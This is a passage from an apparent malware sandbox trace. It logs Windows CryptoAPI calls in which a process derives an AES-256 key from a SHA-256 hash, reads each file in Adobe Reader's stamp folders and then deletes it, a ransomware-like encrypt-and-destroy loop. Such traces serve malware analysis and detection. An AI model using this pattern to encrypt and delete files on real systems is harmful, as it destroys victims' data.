Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.111] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.111] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.111] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.111] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xffc9 [0213.111] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.134] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.134] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.134] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.136] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\hanko.pdf")) returned 1 [0213.137] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.138] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.138] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.138] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.138] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa447 [0213.138] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.152] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.152] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.152] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.153] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\signhere.pdf")) returned 1 [0213.155] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.155] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.156] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.156] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.156] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c005 [0213.156] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.199] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.199] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.199] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.200] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\standardbusiness.pdf")) returned 1 [0213.202] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0213.451] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.451] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.451] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.451] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.451] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12b04 [0213.451] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.468] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.468] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.468] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.469] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\dynamic.pdf")) returned 1 [0213.471] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.472] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.472] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.472] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.472] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeac1 [0213.472] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.484] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.484] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.484] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.485] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\hanko.pdf")) returned 1 [0213.487] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.487] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.487] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.487] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.488] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd074 [0213.488] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.545] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.545] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.545] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.546] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\signhere.pdf")) returned 1 [0213.547] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.548] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.548] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.548] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.548] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24f7f [0213.548] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.563] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.563] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.563] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.565] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\standardbusiness.pdf")) returned 1 [0213.568] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0213.726] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.726] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.726] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.726] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.727] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xff3a [0213.727] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.732] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.732] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.732] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.732] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\dynamic.pdf")) returned 1 [0213.734] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.734] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.734] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.734] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.734] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9542 [0213.734] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.738] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.738] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.738] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.740] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\signhere.pdf")) returned 1 [0213.741] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.742] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.742] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.742] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.742] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x180e0 [0213.742] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.748] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.748] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.748] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.749] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\standardbusiness.pdf")) returned 1 [0213.751] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0213.759] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.760] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.760] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.760] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.760] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfbd7 [0213.760] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.775] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.775] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.775] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.776] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\dynamic.pdf")) returned 1 [0213.798] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.798] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.798] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.798] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.798] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x95a4 [0213.798] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.802] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.802] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.802] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.803] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\signhere.pdf")) returned 1 [0213.805] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.805] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.805] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.805] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.805] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17ff8 [0213.805] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.822] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.822] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.822] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.823] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf")) returned 1 [0213.836] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0213.836] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.837] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.837] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.837] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.837] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x907a [0213.837] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.841] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.841] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.841] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.842] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\dynamic.pdf")) returned 1 [0213.844] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.844] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.844] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.844] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.844] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0213.844] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.855] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.855] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.855] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.857] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\faces.pdf")) returned 1 [0213.858] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.858] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.858] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.858] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.859] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0213.859] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.914] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.914] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.914] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.916] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\pointers.pdf")) returned 1 [0213.917] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.918] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.918] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.918] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.918] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fff9 [0213.918] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.947] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.947] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.947] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.948] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\signhere.pdf")) returned 1 [0213.952] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.952] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.952] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.952] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.952] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0213.952] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.959] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.959] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.959] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.960] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf" 